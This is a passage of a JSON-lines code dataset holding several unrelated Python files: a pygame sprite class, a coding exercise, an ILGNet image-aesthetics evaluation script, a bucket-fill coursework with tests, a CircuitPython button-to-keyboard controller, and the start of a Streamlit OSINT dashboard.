continue?',\n\t\t\t\t\t\t\t'Yes (Y) or No (N)']\n\t\t\tsnip = self.custom_font.render('', True, (255, 255, 255))\n\t\t\tcounter = 0\n\t\t\t# the bigger the speed variable, the slower it goes because of math\n\t\t\tspeed = 4\n\t\t\tactive_message = 0\n\t\t\tmessage = messages[active_message]\n\t\t\tdone = False\n\t\t\t\n\n\t\t\twhile level_request:\n\t\t\t\tpygame.draw.rect(display_surface, (0, 0, 0), pygame.Rect(225, 70, 400, 70))\n\t\t\t\tpygame.draw.rect(display_surface, (255, 255, 255), pygame.Rect(230, 75, 390, 60))\n\n\t\t\t\tif counter < speed * len(message):\n\t\t\t\t\tcounter += 1\n\t\t\t\telif counter >= speed * len(message):\n\t\t\t\t\tdone = True\n\t\t\t\tfor event in pygame.event.get():\n\t\t\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\t\t\tif event.key == pygame.K_RETURN and done and active_message < len(messages) - 1:\n\t\t\t\t\t\t\tactive_message += 1\n\t\t\t\t\t\t\tdone = False\n\t\t\t\t\t\t\tmessage = messages[active_message]\n\t\t\t\t\t\t\tcounter = 0\n\t\t\t\t\t\telif event.key == pygame.K_y: \n\t\t\t\t\t\t\t#transition and change game state\n\t\t\t\t\t\t\tsettings.next_game_state = collided_entrance.level_number\n\t\t\t\t\t\t\tsettings.transition = True\n\t\t\t\t\t\t\tpygame.image.save(self.screen,\"./LevelSelector/TransitionImages/screenshot.png\")\n\t\t\t\t\t\t\tlevel_request = False\t\t\t\n\n\t\t\t\t\t\t\t#change music\n\t\t\t\t\t\t\tpygame.mixer.music.stop()\n\t\t\t\t\t\t\tpygame.mixer.Sound.play(pygame.mixer.Sound('./SFX/transition_sound.wav'))\n\t\t\t\t\t\t\tpygame.time.delay(1000)\n\t\t\t\t\t\t\tif not settings.mute:\n\t\t\t\t\t\t\t\tif settings.next_game_state == -1:\n\t\t\t\t\t\t\t\t\tpygame.image.save(self.screen, \"./LevelSelector/TransitionImages/screenshot.png\")\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.load('./SFX/menu_music.mp3')\n\t\t\t\t\t\t\t\telif settings.next_game_state == 1:\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.load('./SFX/level_one_bg.mp3')\n\t\t\t\t\t\t\t\telif settings.next_game_state == 2:\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.load('./SFX/levelTwo.mp3')\n\t\t\t\t\t\t\t\telif settings.next_game_state == 3:\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.load('./SFX/levelThree.mp3')\n\t\t\t\t\t\t\t\tif settings.next_game_state == -1 or settings.next_game_state == 1 or settings.next_game_state == 2 or settings.next_game_state == 3:\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.play(-1)\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.set_volume(0.1)\n\t\t\t\t\t\telif event.key == pygame.K_n: \n\t\t\t\t\t\t\tself.hitbox.y += 20\n\t\t\t\t\t\t\tlevel_request = False\n\t\t\t\t\n\t\t\t\tsnip = self.custom_font.render(message[0:counter//speed], True, (0, 0, 0))\n\t\t\t\tif active_message == 3:\n\t\t\t\t\tdisplay_surface.blit(snip, (330, 100))\t\n\t\t\t\telse:\n\t\t\t\t\tdisplay_surface.blit(snip, (240, 100))\n\n\t\t\t\tpygame.display.flip()\n\n\n\tdef update(self): \n\t\t# self.screen.blit(self.hitbox)\n\t\tself.input()\n\t\tself.move(self.speed)\n\t\tself.check_animations()\n\n\n\tdef animate(self, sprite_list, speed, idle = False):\n # loop through sprite list and change current sprite \n\t\tif idle: \n\t\t\tself.image = sprite_list[0]\n\n\t\tif not idle: \n\t\t\tif self.current_sprite < len(sprite_list) - 0.1:\n\t\t\t\tself.current_sprite += speed\n\t\t\telse:\n\t\t\t\tself.current_sprite = 0\n\n\t\t\tself.image = sprite_list[int(self.current_sprite)]\n\n\t\tself.previous_sprite_list = sprite_list\n\n\tdef animate_dust(self, pos_x, pos_y, speed): \n\t\tif self.current_dust < len(self.dust_right_frames) - 0.1:\n\t\t\t\tself.current_dust += speed\n\t\telse:\n\t\t\tself.current_dust = 0\n\n\t\tself.dust_image = self.dust_right_frames[int(self.current_sprite)]\n\t\tself.screen.blit(self.dust_image, (settings.DISPLAY_WIDTH // 2 + pos_x, settings.DISPLAY_HEIGHT // 2 + pos_y))\n\n\n\tdef check_animations(self):\n\t\tkeys = pygame.key.get_pressed()\n\n\t\tif (keys[pygame.K_LEFT] or keys[pygame.K_a]) and self.direction.x < 0:\n\t\t\tself.animate(self.walk_left_frames, 0.1)\n\t\t\tself.animate_dust(9, 11, 0.1)\n\t\telif (keys[pygame.K_RIGHT] or keys[pygame.K_d] and self.direction.x > 0):\n\t\t\tself.animate(self.walk_right_frames, 0.1)\n\t\t\tself.animate_dust(-22, 11, 0.1)\n\t\telif (keys[pygame.K_UP] or keys[pygame.K_w]):\n\t\t\tself.animate(self.walk_back_frames, 0.1)\n\t\t\tself.animate_dust(0, 20, 0.1)\n\t\telif (keys[pygame.K_DOWN] or keys[pygame.K_s]):\n\t\t\tself.animate(self.walk_front_frames, 0.1)\n\t\t\tself.animate_dust(0, -24, 0.1)\n\t\telse: \n\t\t\tself.animate(self.previous_sprite_list, 0.1, True)\n\n\n\n\tdef load_animation_sprites(self):\n\t\tself.walk_back_frames = []\n\t\tself.walk_front_frames = []\n\t\tself.walk_right_frames = []\n\t\tself.walk_left_frames = []\n\n\t\tself.dust_right_frames = []\n\t\tself.dust_left_frames = []\n\n\t\tfor i in range(1, 4):\n\t\t\tself.walk_back_frames.append(pygame.image.load(f'./LevelSelector/SpritesAndArt/sprite animations/back/back({i}).png').convert_alpha())\n\t\t\tself.walk_front_frames.append(pygame.image.load(f'./LevelSelector/SpritesAndArt/sprite animations/front/front({i}).png').convert_alpha())\n\t\t\tself.walk_right_frames.append(pygame.image.load(f'./LevelSelector/SpritesAndArt/sprite animations/right/right({i}).png').convert_alpha())\n\n\t\tself.walk_back_frames.insert(2, pygame.image.load('./LevelSelector/SpritesAndArt/sprite animations/back/back(1).png').convert_alpha())\n\t\tself.walk_front_frames.insert(2, pygame.image.load('./LevelSelector/SpritesAndArt/sprite animations/front/front(1).png').convert_alpha())\n\t\tself.walk_right_frames.insert(2, pygame.image.load('./LevelSelector/SpritesAndArt/sprite animations/right/right(1).png').convert_alpha())\n\n\t\tfor frame in self.walk_right_frames:\n\t\t\tself.walk_left_frames.append(pygame.transform.flip(frame, True, False))\n\n\t\tfor i in range (1, 8):\n\t\t\tself.dust_right_frames.append(pygame.image.load(f\"./LevelSelector/SpritesAndArt/running dust/Split/dust({i}).png\"))\n\n\t\tfor frame in self.dust_right_frames:\n\t\t\tself.dust_left_frames.append(pygame.transform.flip(frame, True, False))\n\n","repo_name":"EL132/platformer","sub_path":"output/main/LevelSelector/Code/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":9164,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40212308354","text":"\"\"\"Given an array of integers.\r\n\r\nReturn an array, where the first element is the count of positives numbers and the second element is sum of negative numbers.\r\n\r\nIf the input array is empty or null, return an empty array.\r\nExample\r\n\r\nFor input [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, -11, -12, -13, -14, -15], you should return [10, -65].\"\"\"\r\n\r\ndef count_positives_sum_negatives(lst):\r\n if not lst:\r\n return []\r\n pos, neg = 0,0\r\n for i in lst:\r\n if i <= 0:\r\n neg += i\r\n else:\r\n pos += 1\r\n return [pos,neg]\r\n","repo_name":"nadiabahrami/c_war_practice","sub_path":"level_8/posnegcases.py","file_name":"posnegcases.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14630674664","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\n\nimport numpy as np\n# import matplotlib\n# matplotlib.use('Agg')\n# import matplotlib.pyplot as plt\n\nimport torch\nimport torch.autograd as autograd\nimport torch.optim as optim\n\nimport torchvision.transforms as transforms\nimport torchvision.datasets as dsets\nimport torchvision.models as models\n\n# import lrs\nimport tensorboardX\n\nfrom ILGNet import ILGNet\nfrom data_loader import AVADataset\n\nfrom tensorboardX import SummaryWriter\n\n\ndef getName(prefix):\n import socket\n from datetime import datetime\n current_time = datetime.now().strftime('%b%d_%H-%M-%S')\n log_dir = os.path.join(prefix, current_time + '_' + socket.gethostname())\n return log_dir\n\n\nwriter = SummaryWriter(getName(\"/data/output/\"))\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef compute_acc(label: torch.Tensor, pred: torch.Tensor):\n dist = torch.arange(10).float().to(device)\n l_mean = (label.view(-1, 10) * dist).sum(dim=1)\n l_good = l_mean > 5\n acc = (pred.argmax(dim=1).byte() == l_good).float().mean()\n return acc\n\n\ndef main(config):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n val_transform = transforms.Compose([\n transforms.Scale(260),\n transforms.RandomCrop(227),\n transforms.ToTensor()])\n\n valset = AVADataset(csv_file=config.val_csv_file, root_dir=config.val_img_path, transform=val_transform)\n val_loader = torch.utils.data.DataLoader(valset, batch_size=config.val_batch_size,\n shuffle=False, num_workers=config.num_workers)\n\n model = ILGNet()\n model.load_state_dict(torch.load('/data/jinjing/ILGNet_pytorch.pth'))\n model = model.to(device)\n\n param_num = 0\n for param in model.parameters():\n param_num += int(np.prod(param.shape))\n print('Trainable params: %.2f million' % (param_num / 1e6))\n\n step = 0\n # do validation after each epoch\n batch_val_losses = []\n val_acc = []\n for i, data in enumerate(val_loader):\n print(i)\n model.eval()\n images = data['image'].to(device)\n labels = data['annotations'].to(device).float()\n with torch.no_grad():\n outputs = model(images)\n step += 1\n val_acc.append(compute_acc(labels, outputs))\n\n writer.add_scalar('val/accuracy', np.mean(val_acc), step)\n print(np.mean(val_acc))\n print('done')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n # input parameters\n parser.add_argument('--train_img_path', type=str, default='/data/full_ava/train/images/')\n parser.add_argument('--val_img_path', type=str, default='/data/full_ava/train/images/')\n parser.add_argument('--test_img_path', type=str, default='/data/full_ava/train/images/')\n parser.add_argument('--train_csv_file', type=str, default='/data/full_ava/train/train.csv')\n parser.add_argument('--val_csv_file', type=str, default='/data/full_ava/train/val.csv')\n parser.add_argument('--test_csv_file', type=str, default='/data/full_ava/train/test.csv')\n\n # training parameters\n parser.add_argument('--train', type=bool, default=True)\n parser.add_argument('--test', type=bool, default=False)\n parser.add_argument('--conv_base_lr', type=float, default=1e-3)\n parser.add_argument('--dense_lr', type=float, default=1e-2)\n parser.add_argument('--lr_decay_rate', type=float, default=0.95)\n parser.add_argument('--lr_decay_freq', type=int, default=10)\n parser.add_argument('--train_batch_size', type=int, default=128)\n parser.add_argument('--val_batch_size', type=int, default=256)\n parser.add_argument('--test_batch_size', type=int, default=1)\n parser.add_argument('--num_workers', type=int, default=16)\n parser.add_argument('--epochs', type=int, default=100)\n\n # misc\n parser.add_argument('--ckpt_path', type=str, default='/data/output/')\n parser.add_argument('--multi_gpu', type=bool, default=False)\n parser.add_argument('--gpu_ids', type=list, default=None)\n parser.add_argument('--warm_start', type=bool, default=False)\n parser.add_argument('--warm_start_epoch', type=int, default=0)\n parser.add_argument('--early_stopping_patience', type=int, default=5)\n parser.add_argument('--save_fig', type=bool, default=False)\n\n # config = parser.parse_args()\n config, unknown = parser.parse_known_args()\n writer.add_text(\"Config\", str(config))\n\n main(config)\n","repo_name":"VoVAllen/ILGNet_pytorch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23663605896","text":"\"\"\" Coursework 1: Bucket Fill\n\"\"\"\nimport copy\nimport random\n\ndef load_image(filename):\n \"\"\" Load image from file made of 0 (unfilled pixels) and 1 (boundary pixels) and 2 (filled pixel)\n\n Example of content of filename:\n\n0 0 0 0 1 1 0 0 0 0\n0 0 1 1 0 0 1 1 0 0\n0 1 1 0 0 1 0 1 1 0\n1 1 0 0 1 0 1 0 1 1\n1 0 0 1 0 0 1 0 0 1\n1 0 0 1 0 0 1 0 0 1\n1 1 0 1 0 0 1 0 1 1\n0 1 1 0 1 1 0 1 1 0\n0 0 1 1 0 0 1 1 0 0\n0 0 0 0 1 1 0 0 0 0\n\n Args:\n filename (str) : path to file containing the image representation\n\n Returns:\n list : a 2D representation of the filled image, where\n 0 represents an unfilled pixel,\n 1 represents a boundary pixel\n 2 represents a filled pixel\n \"\"\"\n\n image = []\n with open(filename) as imagefile:\n for line in imagefile:\n if line.strip():\n row = list(map(int, line.strip().split()))\n image.append(row)\n return image\n\n\ndef stringify_image(image):\n \"\"\" Convert image representation into a human-friendly string representation\n\n Args:\n image (list) : list of lists of 0 (unfilled pixel), 1 (boundary pixel) and 2 (filled pixel)\n\n Returns:\n str : a human-friendly string representation of the image\n \"\"\"\n \n if image is None:\n return \"\"\n\n # The variable \"mapping\" defines how to display each type of pixel.\n mapping = {\n 0: \" \",\n 1: \"*\",\n 2: \"0\"\n }\n\n image_str = \"\"\n if image:\n image_str += \"_ \" * (len(image[0]) + 2) + \"\\n\"\n for row in image:\n image_str += \"| \"\n for pixel in row:\n image_str += mapping.get(pixel, \"?\") + \" \"\n image_str += \"|\"\n image_str += \"\\n\"\n if image:\n image_str += \"‾ \" * (len(image[0]) + 2) + \"\\n\"\n\n return image_str\n\n\ndef show_image(image):\n \"\"\" Show image in terminal\n\n Args:\n image (list) : list of lists of 0 (unfilled pixel), 1 (boundary pixel) and 2 (filled pixel)\n \"\"\"\n print(stringify_image(image))\n\n\n## My function\ndef is_unfilled(image, row, col):\n '''\n Check whether a pixel is unfilled, i.e. has label 0. \n '''\n if (row < 0 or row > len(image) - 1):\n return False\n\n if (col < 0 or col > len(image[0]) - 1):\n return False\n\n if image[row][col] == 0:\n return True\n else:\n return False\n\n \ndef fill(image, seed_point):\n \"\"\" Fill the image from seed point to boundary\n\n the image should remain unchanged if:\n - the seed_point has a non-integer coordinate\n - the seed_point has a negative coordinate\n - the seed_point is outside of the image\n - the seed_point is on a boundary pixel\n \n Args:\n image (list) : a 2D nested list representation of an image, where\n 0 represents an unfilled pixel, and\n 1 represents a boundary pixel\n seed_point (tuple) : a 2-element tuple representing the (row, col) \n coordinates of the seed point to start filling\n\n Returns:\n list : a 2D representation of the filled image, where\n 0 represents an unfilled pixel,\n 1 represents a boundary pixel, and\n 2 represents a filled pixel\n \"\"\"\n row = seed_point[0]\n col = seed_point[1]\n filled_image = copy.deepcopy(image) # To ensure that image remains unchanged in test cases\n \n if (isinstance(row, int) and isinstance(col, int)) == False:\n # print(\"The seed point has a non-integer coordinate.\")\n return filled_image\n \n if row < 0 or col < 0:\n # print(\"The seed point has a negative coordinate.\") \n return filled_image\n \n if row > len(filled_image) - 1 or col > len(filled_image[0]) - 1:\n # print(\"The seed point is outside the image.\") \n return filled_image\n \n if filled_image[row][col] == 1:\n # print(\"The seed point is on a boundary pixel.\") \n return filled_image\n\n p = [] # Initiate an empty list of points\n filled_image[row][col] = 2 # Fill the seed point \n p.append((row, col)) # Add the seed point to the list\n\n while len(p) > 0:\n (cur_row, cur_col) = p[0]\n del p[0] # To ensure that new neighbouring points are explored\n\n if is_unfilled(filled_image, cur_row - 1, cur_col):\n filled_image[cur_row - 1][cur_col] = 2\n p.append((cur_row - 1, cur_col))\n\n if is_unfilled(filled_image, cur_row + 1, cur_col):\n filled_image[cur_row + 1][cur_col] = 2\n p.append((cur_row + 1, cur_col))\n\n if is_unfilled(filled_image, cur_row, cur_col - 1):\n filled_image[cur_row][cur_col - 1] = 2\n p.append((cur_row, cur_col - 1))\n\n if is_unfilled(filled_image, cur_row, cur_col + 1):\n filled_image[cur_row][cur_col + 1] = 2\n p.append((cur_row, cur_col + 1))\n\n return filled_image\n\n\n## Testing \n# Test for 1*1 images\ndef test_one_pixel():\n pixel_1 = [[0]]\n pixel_2 = [[1]]\n seed_point = (0,0)\n filled_image_1 = fill(pixel_1, seed_point)\n filled_image_2 = fill(pixel_2, seed_point)\n expected_image_1 = [[2]]\n expected_image_2 = [[1]]\n assert(filled_image_1 == expected_image_1)\n assert(filled_image_2 == expected_image_2)\n\n \n# Test for a 1*2 image\ndef test_small_image():\n small_image = [[0],[1]]\n seed_point_1 = (0,0) # Start at an unfilled pixel\n seed_point_2 = (0,1) # Start at a boundary pixel\n filled_image_1 = fill(small_image, seed_point_1)\n filled_image_2 = fill(small_image, seed_point_2)\n expected_image_1 = [[2],[1]]\n expected_image_2 = [[0],[1]]\n assert(filled_image_1 == expected_image_1)\n assert(filled_image_2 == expected_image_2)\n\n\n# Test for a 5*6 image with different seed point locations\nexample_image = [[0, 0, 0, 0, 0, 0],\n [1, 0, 1, 1, 1, 0],\n [0, 1, 0, 0, 0, 1],\n [0, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 0]]\n\ndef test_seed_point_in_middle():\n seed_point = (2,4)\n filled_image = fill(example_image, seed_point) \n expected_image = [[0, 0, 0, 0, 0, 0],\n [1, 0, 1, 1, 1, 0],\n [0, 1, 2, 2, 2, 1],\n [0, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 0]] \n assert(filled_image == expected_image)\n\n\ndef test_seed_point_on_bottom():\n seed_point = (3,1)\n filled_image = fill(example_image, seed_point) \n expected_image = [[0, 0, 0, 0, 0, 0],\n [1, 0, 1, 1, 1, 0],\n [2, 1, 0, 0, 0, 1],\n [2, 2, 1, 1, 1, 2],\n [2, 2, 2, 2, 2, 2]]\n assert(filled_image[2] == expected_image[2])\n\n\ndef test_seed_point_on_top():\n seed_point = (0,5)\n filled_image = fill(example_image, seed_point) \n expected_image = [[2, 2, 2, 2, 2, 2],\n [1, 2, 1, 1, 1, 2],\n [0, 1, 0, 0, 0, 1],\n [0, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 0]]\n assert(filled_image == expected_image) \n \n\n# Test for a 15*15 image\ndef test_median_image():\n median_image = load_image(\"data/snake.txt\")\n seed_point = (3,6)\n filled_image = fill(median_image, seed_point)\n expected_image = [[0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0],\n [0, 0, 1, 2, 1, 2, 2, 2, 1, 2, 1, 0, 0, 0, 0],\n [0, 0, 1, 2, 1, 2, 2, 2, 1, 2, 2, 1, 0, 0, 0],\n [0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0],\n [0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],\n [0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0],\n [0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0],\n [1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1],\n [0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1],\n [0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0]]\n assert(filled_image == expected_image)\n\n\n# Test for cases of invalid seed points\n# On the 5*6 image as an example\ndef test_non_integer_seedpoint():\n seed_point = (2.5,3) \n filled_image = fill(example_image, seed_point) \n assert(filled_image == example_image)\n\ndef test_seedpoint_with_negative_coordinate():\n seed_point = (-1,3) \n filled_image = fill(example_image, seed_point)\n assert(filled_image == example_image)\n \ndef test_outbound_seedpoint():\n seed_point = (6,3) \n filled_image = fill(example_image, seed_point)\n assert(filled_image == example_image)\n \ndef test_seedpoint_at_boundary():\n seed_point = (2,1) \n filled_image = fill(example_image, seed_point)\n assert(filled_image == example_image)\n\n\n# Running the tests \ntest_one_pixel()\ntest_small_image()\ntest_median_image()\ntest_seed_point_in_middle()\ntest_seed_point_on_bottom()\ntest_seed_point_on_top()\ntest_non_integer_seedpoint()\ntest_seedpoint_with_negative_coordinate()\ntest_outbound_seedpoint()\ntest_seedpoint_at_boundary()\n\n\ndef example_fill():\n image = load_image(\"data/bar.txt\")\n\n print(\"Before filling:\")\n show_image(image)\n\n image = fill(image=image, seed_point=(7, 3))\n\n print(\"-\" * 25)\n print(\"After filling:\")\n show_image(image)\n\n\nif __name__ == '__main__':\n example_fill()\n","repo_name":"CharlizeY/AI-term-1","sub_path":"Python Programming/CW1/python_cw1_yy3219/bucket_fill.py","file_name":"bucket_fill.py","file_ext":"py","file_size_in_byte":9604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74628305767","text":"import board\nimport digitalio\nimport time\nimport usb_hid\nfrom adafruit_hid.keyboard import Keyboard\nfrom adafruit_hid.keycode import Keycode\n\n# Pin definitions\nbutton_pin_a = digitalio.DigitalInOut(board.A0)\nbutton_pin_a.direction = digitalio.Direction.INPUT\nbutton_pin_a.pull = digitalio.Pull.UP\n\nbutton_pin_s = digitalio.DigitalInOut(board.A1)\nbutton_pin_s.direction = digitalio.Direction.INPUT\nbutton_pin_s.pull = digitalio.Pull.UP\n\nbutton_pin_d = digitalio.DigitalInOut(board.A2)\nbutton_pin_d.direction = digitalio.Direction.INPUT\nbutton_pin_d.pull = digitalio.Pull.UP\n\nbutton_pin_w = digitalio.DigitalInOut(board.A3)\nbutton_pin_w.direction = digitalio.Direction.INPUT\nbutton_pin_w.pull = digitalio.Pull.UP\n\nbutton_pin_o = digitalio.DigitalInOut(board.D13)\nbutton_pin_o.direction = digitalio.Direction.INPUT\nbutton_pin_o.pull = digitalio.Pull.UP\n\nbutton_pin_i = digitalio.DigitalInOut(board.D12)\nbutton_pin_i.direction = digitalio.Direction.INPUT\nbutton_pin_i.pull = digitalio.Pull.UP\n\nbutton_pin_u = digitalio.DigitalInOut(board.D11)\nbutton_pin_u.direction = digitalio.Direction.INPUT\nbutton_pin_u.pull = digitalio.Pull.UP\n\nbutton_pin_j = digitalio.DigitalInOut(board.D10)\nbutton_pin_j.direction = digitalio.Direction.INPUT\nbutton_pin_j.pull = digitalio.Pull.UP\n\nbutton_pin_k = digitalio.DigitalInOut(board.D9)\nbutton_pin_k.direction = digitalio.Direction.INPUT\nbutton_pin_k.pull = digitalio.Pull.UP\n\nbutton_pin_l = digitalio.DigitalInOut(board.D6)\nbutton_pin_l.direction = digitalio.Direction.INPUT\nbutton_pin_l.pull = digitalio.Pull.UP\n\n# Create a Keyboard object\nkbd = Keyboard(usb_hid.devices)\n\n# Function to send the key press\ndef send_key(key):\n kbd.press(key)\n\n# Function to release the key\ndef release_key(key):\n kbd.release(key)\n\n# Main loop\nkeys_pressed = set() # Track the currently pressed keys\nwhile True:\n # Check if the \"A\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_a.value:\n if Keycode.A not in keys_pressed:\n send_key(Keycode.A)\n keys_pressed.add(Keycode.A)\n else:\n if Keycode.A in keys_pressed:\n release_key(Keycode.A)\n keys_pressed.remove(Keycode.A)\n\n # Check if the \"S\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_s.value:\n if Keycode.S not in keys_pressed:\n send_key(Keycode.S)\n keys_pressed.add(Keycode.S)\n else:\n if Keycode.S in keys_pressed:\n release_key(Keycode.S)\n keys_pressed.remove(Keycode.S)\n\n # Check if the \"D\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_d.value:\n if Keycode.D not in keys_pressed:\n send_key(Keycode.D)\n keys_pressed.add(Keycode.D)\n else:\n if Keycode.D in keys_pressed:\n release_key(Keycode.D)\n keys_pressed.remove(Keycode.D)\n\n # Check if the \"W\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_w.value:\n if Keycode.W not in keys_pressed:\n send_key(Keycode.W)\n keys_pressed.add(Keycode.W)\n else:\n if Keycode.W in keys_pressed:\n release_key(Keycode.W)\n keys_pressed.remove(Keycode.W)\n\n # Check if the \"O\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_o.value:\n if Keycode.O not in keys_pressed:\n send_key(Keycode.O)\n keys_pressed.add(Keycode.O)\n else:\n if Keycode.O in keys_pressed:\n release_key(Keycode.O)\n keys_pressed.remove(Keycode.O)\n\n # Check if the \"I\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_i.value:\n if Keycode.I not in keys_pressed:\n send_key(Keycode.I)\n keys_pressed.add(Keycode.I)\n else:\n if Keycode.I in keys_pressed:\n release_key(Keycode.I)\n keys_pressed.remove(Keycode.I)\n\n # Check if the \"U\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_u.value:\n if Keycode.U not in keys_pressed:\n send_key(Keycode.U)\n keys_pressed.add(Keycode.U)\n else:\n if Keycode.U in keys_pressed:\n release_key(Keycode.U)\n keys_pressed.remove(Keycode.U)\n\n # Check if the \"J\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_j.value:\n if Keycode.J not in keys_pressed:\n send_key(Keycode.J)\n keys_pressed.add(Keycode.J)\n else:\n if Keycode.J in keys_pressed:\n release_key(Keycode.J)\n keys_pressed.remove(Keycode.J)\n\n # Check if the \"K\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_k.value:\n if Keycode.K not in keys_pressed:\n send_key(Keycode.K)\n keys_pressed.add(Keycode.K)\n else:\n if Keycode.K in keys_pressed:\n release_key(Keycode.K)\n keys_pressed.remove(Keycode.K)\n\n # Check if the \"L\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_l.value:\n if Keycode.L not in keys_pressed:\n send_key(Keycode.L)\n keys_pressed.add(Keycode.L)\n else:\n if Keycode.L in keys_pressed:\n release_key(Keycode.L)\n keys_pressed.remove(Keycode.L)\n\n # Add a small delay to avoid excessive key presses (adjust as needed)\n time.sleep(0.025)\n","repo_name":"TheDemopan/panbox-firmware","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15593751093","text":"import re\nimport streamlit as st\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom itertools import chain\nfrom datetime import datetime\nfrom wordcloud import WordCloud\n\nimport components\n\nDISPLAY_DATE_SLIDER = False\n\n\nif __name__ == '__main__':\n\tst.markdown('', unsafe_allow_html=True)\n\tst.markdown('', unsafe_allow_html=True)\n\tst.markdown('Fork me on GitHub', unsafe_allow_html=True)\n\n\tst.title(\":bar_chart: Adana\")\n\n\tst.markdown(body=\"### 1-click analytical dashboard for OSINT researchers\")\n\n\tdf = st.session_state.get(\"df\", None)\n\tif df is None:\n\t\tdf = None\n\t\tdatasets_count = 1\n\n\t\tdatasets = {\n\t\t\t'Bellingcat 2023 mentions': 'data/Bellingcat_Labeled.csv',\n\t\t\t'Russo-Ukrainian War': 'data/RussianUkrainianLabeled.csv',\n\t\t\t'OSINT Zeeschuimer': 'data/OSINT_Zeeschuimer.ndjson',\n\t\t}\n\n\t\toption = ''\n\n\t\tcol1, col2, col3 = st.columns([1,1,1])\n\t\twith col1:\n\t\t\tname = list(datasets.keys())[0]\n\t\t\tif st.button(f'Test example ({name})', type=\"primary\", on_click=lambda: st.session_state.clear()):\n\t\t\t\toption = name\n\t\t\t\tdf = components.process_maltego_csv_file(datasets[name])\n\t\twith col2:\n\t\t\tname = list(datasets.keys())[1]\n\t\t\tif st.button(f'Test example (Russo-Ukrainian War)', type=\"primary\", on_click=lambda: st.session_state.clear()):\n\t\t\t\tdf = components.process_maltego_csv_file(datasets[name])\n\t\t\t\toption = name\n\t\twith col3:\n\t\t\tname = list(datasets.keys())[2]\n\t\t\tif st.button(f'Test example ({name})', type=\"primary\", on_click=lambda: st.session_state.clear()):\n\t\t\t\toption = name\n\t\t\t\tf = open(datasets[option])\n\t\t\t\tdf = components.process_ndjson_file(f)\n\n\t\tif option:\n\t\t\tst.markdown(f\"Rendering test datest '{option}'...\")\n\n\t\tif df is None:\n\t\t\tst.markdown(body=\"\"\"Run test of example dataset analysis OR upload datasets (**you can use several**) of posts. \"\"\")\n\n\t\t\twith st.expander(\"Read more about Adana\"):\n\t\t\t\tst.markdown(\"Adana means 'Analytical DAshboard (for NArratives)'.\")\n\t\t\t\tst.markdown(\"Currently Twitter is only supported: Zeeschuimer (Twitter API ndjson) and CSV format\")\n\t\t\t\tst.markdown(\"Remind you that results of analysis depends on the quality of dataset.\")\n\t\t\t\tst.markdown(\"Read [here](https://docs.google.com/document/d/10xOgmZmvLM-BJeak-KNXzkx7H5oqnbn834-o94WbM50/edit#heading=h.1037l5l116z1) how to prepare new datasets.\")\n\n\t\t\tuploaded_files = st.file_uploader(\"Choose a dataset file\", accept_multiple_files=True)\n\n\t\t\tst.markdown(body=\"*[Download datasets examples here](https://drive.google.com/drive/u/0/folders/1GtUZkfD0cZ2xBBZ3FiDpH1Cgw_u-m1wh)*\")\n\t\t\tif not len(uploaded_files):\n\t\t\t\tst.stop()\n\n\t\t\tfor i in range(len(uploaded_files)):\n\t\t\t\tif df is None:\n\t\t\t\t\tdf = components.input_file_to_dataframe(uploaded_files[i])\n\t\t\t\telse:\n\t\t\t\t\tdf = pd.concat([df, 